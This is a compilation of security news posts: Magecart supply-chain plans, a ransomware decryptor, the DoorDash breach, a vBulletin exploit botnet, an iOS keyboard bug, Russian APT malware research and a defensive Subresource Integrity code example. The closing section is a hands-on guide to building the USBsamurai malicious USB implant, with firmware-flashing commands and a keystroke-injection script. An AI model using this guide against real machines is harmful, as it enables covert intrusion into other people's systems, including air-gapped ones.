“We found that MG5 has likely devised an attack scenario in which it could inject its malicious payment card stealing code into a popular open-source JavaScript library. This open-source code is provided as a free, licensed tool designed to help make websites compatible with mobile browsing.” reads the analysis published by IBM. “By infecting that code, MG5 can potentially infect and compromise the data of mobile device users that install booby-trapped apps and then shop online.”

The experts speculate that the attackers have prepared code for injection into a specific type of commercial-class L7 router; they pointed out that no vendor compromise has been observed so far.

L7 routers implement both routing and switching capabilities; an attacker who compromises such a network device could potentially perform several malicious activities, such as traffic hijacking.

The router can be installed in the same virtualization server as other business-critical IT infrastructure components, which means that, once compromised, it could be used by hackers for lateral movement.

The Wi-Fi connectivity is usually offered for free in locations such as hotels that prefer to outsource the Wi-Fi service, but most vendors for Wi-Fi service do not support proxying adverts or JavaScript injection.

“Having access to a large number of captive users with very high turnover — such as in the case of airports and hotels — is a lucrative concept for attackers looking to compromise payment data.” continues IBM. “We believe that MG5 aims to find and infect L7 router libraries with malicious code and possibly inject malicious ads that captive users must click on to eventually connect to the internet.”

Attackers can compromise L7 routers to steal guest payment data from users who browse websites through the compromised network device; they can also inject malicious ads into webpages viewed by all connected guest devices.

IBM experts also believe that the Magecart hackers have infected open-source mobile app code that’s offered to app developers for free.

“Another finding from X-Force IRIS with regards to code being tested by Magecart Group 5 concerns open-source mobile app code that’s offered to app developers for free. The code provides a library-agnostic touch slider to allow developers to build touch galleries for their app projects.” concludes the report.

“MG5 has likely infected this code, corrupting it as its source to ensure that every developer using the slider will end up serving the attackers’ malicious code, leading to the compromise of data belonging to those using the finished product.”

The report also includes mitigation tips to prevent access to data.
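One standard mitigation against a tampered JavaScript library of the kind described above is Subresource Integrity (SRI), which makes the browser refuse a script whose hash does not match the one pinned in the page. The following is an added example, not IBM X-Force's or Security Affairs' code: it computes SRI tokens, verifies fetched bytes against one, and audits a page for `<script src>` tags that carry no `integrity` attribute. The HTML and library bytes are constructed for the example.

```python
"""Subresource Integrity (SRI) generation, verification and page audit (added example)."""
from __future__ import annotations
import base64
import hashlib
from html.parser import HTMLParser

SRI_ALGOS = ("sha256", "sha384", "sha512")   # the only digests SRI permits


def sri_hash(data: bytes, algo: str = "sha384") -> str:
    """SRI token for `data`, e.g. 'sha384-<base64 digest>'."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"SRI permits {SRI_ALGOS}, not {algo!r}")
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(data: bytes, integrity: str) -> bool:
    """True if any space-separated token in `integrity` matches `data` (browser semantics)."""
    for token in integrity.split():
        algo = token.partition("-")[0]
        if algo in SRI_ALGOS and sri_hash(data, algo) == token:
            return True
    return False


class _ScriptAudit(HTMLParser):
    """Collect src values of <script> tags that carry no integrity attribute."""

    def __init__(self) -> None:
        super().__init__()
        self.missing: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src") and not a.get("integrity"):
            self.missing.append(a["src"])


def scripts_without_integrity(html: str) -> list[str]:
    """Every external script on the page that the browser would load unchecked."""
    parser = _ScriptAudit()
    parser.feed(html)
    parser.close()
    return parser.missing


# Constructed library bytes and a modified copy standing in for a tampered one.
GOOD_LIB = b"window.mobileCompat = function () { return true; };\n"
TAMPERED_LIB = GOOD_LIB.replace(b"true", b"false")

# Constructed page: one pinned third-party script, one unpinned local one.
SAMPLE_HTML = f'''<html><head>
<script src="https://cdn.example/mobile-compat.js" integrity="{sri_hash(GOOD_LIB)}" crossorigin="anonymous"></script>
<script src="/static/slider.js"></script>
<script>init();</script>
</head><body></body></html>'''
```

SRI covers the case where the copy of the library delivered to the browser differs from the one the site pinned. It does not help when the library is corrupted at its source, as the report suggests for the slider code, because the developer would then pin the hash of the already-tainted file; that case calls for reviewing and pinning dependencies at build time rather than at page-load time.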

Pierluigi Paganini

(SecurityAffairs – APT, hacking)


Emsisoft released a new free decryption tool for the Avest ransomware

Emsisoft security firm has released a new free decryption tool for the Avest ransomware, a few days after the release of WannaCryFake decryptor.

Emsisoft security firm has released a new free decryption tool for the Avest ransomware, a few days ago the researchers also released a free decryptor for the WannaCryFake ransomware.

The Avest ransomware encrypts victim’s files and appends the extension “.ckey().email().pack14” to the filename.

Below the text of the ransom note “!!!Readme!!!Help!!!.txt” that the ransomware drops on the infected systems:

"Problems with your data? Contact us: data1992@protonmail[.]com key: <victim specific>”

Victims should use the decryption tool only after they have successfully removed the malware from their system, to prevent the Avest ransomware from repeatedly locking the machine or encrypting files again.

“The decryptor requires access to a file pair consisting of one encrypted file and the original, unencrypted version of the encrypted file to reconstruct the encryption keys needed to decrypt the rest of your data.” reads the user guide published by Emsisoft. “Please do not change the file names of the original and encrypted files, as the decryptor may perform file name comparisons to determine the correct file extension used for encrypted files on your system.”

Victims of the Avest ransomware can download the decryptor tool here:

https://www.emsisoft.com/ransomware-decryption-tools/avest

In August, security researchers at Emsisoft released a decryptor tool that allows the victims of the JSWorm 4.0 ransomware to decrypt their files for free. In May, Emsisoft experts released a free decryptor tool for the JSWorm 2.0 variant.

In July the company released other free decryptors for the LooCipher ransomware, the ZeroFucks ransomware, and the Ims00rry ransomware.

Pierluigi Paganini

(SecurityAffairs – Avest ransomware, hacking)

DoorDash Data Breach exposes data of approximately 5 million users

DoorDash is a San Francisco–based on-demand food delivery service. The company confirmed it has suffered a data breach that exposed the data of roughly 5 million users.

DoorDash announced a data breach that exposed the personal information of 4.9 million consumers, Dashers, and merchants.

According to the data breach notification sent to the impacted customers and the security note published on the website, the incident took place on May 4, 2019, when an unauthorized party was able to gain access to user information. Users and merchants who registered on the platform after April 5, 2018, were not impacted.

“Earlier this month, we became aware of unusual activity involving a third-party service provider. We immediately launched an investigation and outside security experts were engaged to assess what occurred. We were subsequently able to determine that an unauthorized third party accessed some DoorDash user data on May 4, 2019.” reads the security notice published on the website. “Approximately 4.9 million consumers, Dashers, and merchants who joined our platform on or before April 5, 2018, are affected. Users who joined after April 5, 2018 are not affected.”

It is not clear how this data was accessed; the company only mentions that it noticed unusual activity involving a third-party service. It is not known whether this data was being hosted by a third-party service provider, whether DoorDash was the victim of a supply-chain attack through this provider, or whether the unauthorized access simply originated from this provider.

Exposed data includes profile information, email addresses, delivery addresses, order history, phone numbers, and hashed and salted passwords. The company also confirmed that for some consumers, Dashers, and merchants, the last four digits of their credit cards or bank accounts were exposed.

“However, full credit card information such as full payment card numbers or a CVV was not accessed. The information accessed is not sufficient to make fraudulent charges on your payment card.” highlighted the company.

The incident also resulted in the exposure of roughly 100,000 driver’s license numbers associated with Dashers.

The company added that it doesn’t believe that user passwords have been compromised, but as a precautionary measure it recommends that users reset their passwords. Users can change their DoorDash password by visiting https://www.doordash.com/accounts/password/reset/.

At the time of writing it is not clear how the data were accessed; the company only mentioned unusual activity involving a third-party service provider. It is not clear whether hackers breached the provider to access DoorDash systems or whether DoorDash data was managed by this partner.

Pierluigi Paganini

(SecurityAffairs – DoorDash, hacking)

Botnet exploits recent vBulletin flaw to protect its bots

Security expert Troy Mursch of Bad Packets reported that a botnet is exploiting the recently disclosed vBulletin exploit to block other attackers from also using it.

The security expert Troy Mursch observed a botnet that is utilizing the recently disclosed vBulletin exploit to lock down vulnerable servers so that they cannot be compromised by other threat actors. This technique is not new and allows botmasters to preserve their own botnets.

Earlier this week, an anonymous security researcher publicly disclosed a zero-day remote code execution flaw, tracked as CVE-2019-16759, in the vBulletin forum software, along with the exploit code to trigger it.

vbulletin

The vulnerability could be exploited remotely by an unauthenticated attacker. The PoC exploit published by the hacker works on vBulletin versions from 5.0.0 through the latest 5.5.4.

The zero-day flaw resides in the way an internal widget file of the forum software package accepts configurations via URL parameters. The expert discovered that the package fails to validate these parameters, so an attacker could exploit it to inject commands and remotely execute code on the vulnerable install.

The threat actor behind the botnet uses the exploit to hack into vulnerable servers, then configures them to require a password to execute commands.

The above images show how the attacker modifies the source code in the includes/vb5/frontend/controller/bbcode.php file in order to require a password for command execution. The image also shows the password used by the botmaster to protect the systems he had infected, which means that another attacker who knows it could use it to send commands to those systems.

According to Mursch, most of the attacks come from Brazil, Vietnam, and India.

Chaouki Bekrar, founder and CEO of the Zerodium exploit broker, confirmed that the vBulletin flaw has been privately circulating for years.

“The availability of a working exploit is aggravated by another publicly posted script that uses the Shodan search site to find vulnerable servers. Attackers can use it to generate a list of vBulletin sites that are susceptible and then use the exploit to take them over.” reported Ars Technica.

Pierluigi Paganini

(SecurityAffairs – vBulletin, hacking)

iOS 13 Bug Gives Third-Party Keyboards “Full Access” Permissions

This week, Apple released iOS 13 and iPadOS; now, a few days later, the company is warning users of an unpatched security flaw in third-party keyboard apps.

Apple has released a security advisory to warn users of an unpatched security bug in iOS 13 that affects third-party keyboard apps. The bug can result in granting keyboard extensions full access, even when users deny it.

Granting keyboard extensions full access could allow developers to capture everything the users type on their devices.

Third-party keyboard extensions in Apple iOS can run without access to external services, or they can request “full access” to provide additional features through network access. Apple announced an upcoming software update to address the issue; the tech giant highlighted that it doesn’t affect Apple’s built-in keyboards.

“Apple has discovered a bug in iOS 13 and iPadOS that can result in keyboard extensions being granted full access even if you haven’t approved this access.” reads the security advisory published by Apple. “This issue does not impact Apple’s built-in keyboards. It also doesn’t impact third-party keyboards that don’t make use of full access. The issue will be fixed soon in an upcoming software update.”

On iOS, third-party keyboard extensions can run entirely standalone without access to external services, and thus are forbidden from storing what you type unless you grant “full access” permissions to enable some additional features through network access.

The bug affects devices running third-party keyboard apps, such as the popular Gboard, Grammarly, and SwiftKey, that request full access from the users.

It should be noted that the iOS 13 bug doesn’t affect Apple’s built-in keyboards or third-party keyboards that don’t make use of full access.

Users can see the installed third-party keyboard apps following these steps:

  1. Open the Settings app.
  2. Go to General > Keyboard > Keyboards.

Users can mitigate this bug by temporarily uninstalling all third-party keyboards from their device.

Pierluigi Paganini

(SecurityAffairs – ios 13, Apple)

Study shows connections between 2000 malware samples used by Russian APT groups

Joint research from Intezer and Check Point Research shows connections between nearly 2,000 malware samples developed by Russian APT groups.

Joint research from Intezer and Check Point Research sheds light on the Russian hacking ecosystem and reveals connections between nearly 2,000 malware samples developed by Russian APT groups.

The report is extremely interesting because it gives analysts an overview of the Russian hacking community and its operations.

The experts also published an interactive map that gives a full overview of this Russian hacking ecosystem.

Since the first publicly known attacks by Moonlight Maze in 1996, many Russian hacking groups have emerged in the threat landscape; their operations have involved highly sophisticated malware and hacking techniques.

“Russia is known to conduct a wide range of cyber espionage and sabotage operations for the last three decades. Beginning with the first publicly known attacks by Moonlight Maze, in 1996, the Pentagon breach in 2008, Blacking out Kyiv in 2016, hacking the United States elections in 2016, and including some of the largest, most infamous cyberattacks in history, targeting an entire nation with NotPetya ransomware.” states the report.

“This led us to gather, classify, and analyze thousands of Russian APT malware samples in order to find connections not only between samples, but also between different families and actors.”

The Russian hacking ecosystem made up of Russian APT groups is very complex. Security firms have collected a huge quantity of information on individual threat actors, but none of them has provided a global picture of the ecosystem.

Take a look at the “Russian APT Map,” which illustrates the connections between different Russian APT malware samples, malware families, and threat actors.

Russian APT MAP

Experts analyzed approximately 2,000 samples that were attributed to Russian APT groups; the researchers found 22,000 connections between the samples, in addition to 3.85 million non-unique pieces of code that were shared. The study classified the samples into 60 families and 200 different modules.

“Every actor or organization under the Russian APT umbrella has its own dedicated malware development teams, working for years in parallel on similar malware toolkits and frameworks. Knowing that a lot of these toolkits serve the same purpose, it is possible to spot redundancy in this parallel activity.” continues the report.

“These findings may suggest that Russia is investing a lot of effort into its operational security. By avoiding different organizations re-using the same tools on a wide range of targets, they overcome the risk that one compromised operation will expose other active operations.”

Experts also released a signature-based tool, dubbed Russian APT Detector, to scan a host or a file against the most commonly re-used pieces of code employed by the Russian APT groups in their operations.

Enjoy the report!

Pierluigi Paganini

(SecurityAffairs – Russian APT, hacking)

USBsamurai for Dummies: How To Make a Malicious USB Implant & Bypass Air-Gapped Environments for 10$. The Dumb-Proof Guide.

The popular researcher Luca Bongiorni described how to make a malicious USB implant (USBsamurai) that allows bypassing air-gapped environments for 10$.

In the previous post, I have talked a bit about USBsamurai based on C-U0007.

With this article I wanna shed more light on:

  • Which are the differences between C-U0007 & C-U0012
  • How to Build USBsamurai with a C-U0012
  • How to flash the C-U0012 with the LIGHTSPEED Firmware
  • How to Flash the C-U0007 with the G700 firmware to achieve better performances and get the Air-Gap Bypass feature
  • How to setup LOGITacker

Let’s get started!

Differences between C-U0007 & C-U0012:

As you see below, they differ quite a bit from an aesthetic point of view. Moreover, the C-U0007 mounts a Nordic chipset and the C-U0012 a TI chipset. This info will be useful when it comes to picking the best hardware for creating USBsamurai.


How to Flash the C-U0007 with the G700 firmware to achieve better performances and get the Air-Gap Bypass feature:

First of all, why do we need to flash the G700 firmware on the C-U0007?

Simple: for keystroke injection, the receiver model matters, as typing speed depends on it. For Unifying receivers (i.e. C-U0007), typing out the Air-Gap Bypass Client takes approx. 2 minutes, which, despite being typed in a stealthy way, is not optimal.

For Unifying receivers with a Nordic chipset (i.e. C-U0007), this could be reduced to 30 seconds if a G700 firmware is used, but injection is always unencrypted* (meaning everybody else could inject too, as G700 accepts plain injection).

*In case you want more privacy while injecting payloads… I recommend using the slightly more expensive C-U0012, which has encryption enabled.

How can we improve C-U0007 speed?
You need to buy an old G700 mouse, dump its firmware with munifying, and then flash all the C-U0007 you want. Luckily, it happens that I have a G700 firmware available HERE🙂 Check below for the detailed instructions.

As for TI receivers (i.e. C-U0008/0012), typing speed could also be reduced to 30 seconds with a LIGHTSPEED firmware. Where do you get the LIGHTSPEED firmware? Either on Logitech’s Github or HERE. This will be discussed in detail later on in this article.

How to Build USBsamurai with a C-U0012

IMPORTANT! Before starting be sure you know what you are doing and have all your tools around!

The process is rather simple:

  • With patience, open the USB dongle and extract the PCB with the antenna.
  • Open the USB cable** without destroying it. Use a scalpel to help you.
  • Slightly cut the white plastic of the USB male connector in order to expose its pins.
  • Add flux and solder to those pins and do the same to the pins on the C-U0012.
  • Solder everything together as in the images below. Help yourself with some clamps if needed. Remember they have to be soldered as close as possible to each other in order to better fit the USB case! Before soldering, check the measures!!! DON’T RUSH the first time!

**I recommend trying with this one; I built a few USBsamurai with this cable. It is quite easy to open with a scalpel. https://www.aliexpress.com/item/33052091501.html

Congrats! Now you have your first USBsamurai based on C-U0012!

How to flash the C-U0012 with the LIGHTSPEED Firmware

Download the firmware either from Logitech’s Github or HERE and use munifying to flash it on the C-U0012 dongle!

For LIGHTSPEED, throughput is higher than with a normal Unifying firmware, and most importantly the covert channel is encrypted. Therefore LOGITacker needs to know its encryption key, which is achieved by pairing the C-U0012 dongle with the LOGITacker itself.

Also remember that if you plan to use a USBsamurai based on C-U0012… LOGITacker needs to run in LIGHTSPEED mode. You can set it with the commands:

Remember: if instead you wanna use a C-U0007 with G700 fw, you will have to switch the operational mode back to g700:

How to Flash the C-U0007 with the G700 firmware to achieve better performances and get the Air-Gap Bypass feature

The Flashing procedure is pretty simple:

  • Plug the C-U0007 dongle on the computer.
  • Download the G700 firmware available HERE.
  • Run “sudo ./munifying flash -r [C-U0007_G700]_RQR21.00_B0007_BOT01.02.B0014.bin”
  • Done! You are ready to pair your new USBsamurai with LOGITacker!

Reminder: LOGITacker needs to run in G700 mode. You can set it with the commands:

If instead you wanna use a C-U0012 with LIGHTSPEED fw, you will have to switch your LOGITacker’s operational mode back to LIGHTSPEED:

How to setup LOGITacker

Here we need to split the topic into a few points, and I won’t go that deep since there is plenty of documentation in its Github repo.

First of all, I assume you have already flashed the latest release of it onto one of the compatible hardware boards. [In case you are updating to the latest release, after flashing it, connect to LOGITacker via serial and issue the erase_flash command. Note that you may lose all your previous scripts and data.]

Working modes (This is mandatory to get everything working properly!!!):

  • For a USBsamurai based on C-U0007 (w/ G700 fw) you need to set the LOGITacker workmode to g700.
  • For a USBsamurai based on C-U0012 (w/ LIGHTSPEED fw) you need to set the LOGITacker workmode to lightspeed.

How to create a script and automatically load it at startup:

Simple: connect to LOGITacker over serial and type something as follows.

script press GUI r
script delay 500
script string iexplore -k http://fakeupdate.net/wnc/
script delay 200
script press RETURN
script store wannacry

Once saved in the flash, try to load it again.

script load wannacry
script show

The following commands will tell LOGITacker to use this payload as the default one for each injection.

options inject default-script wannacry
options store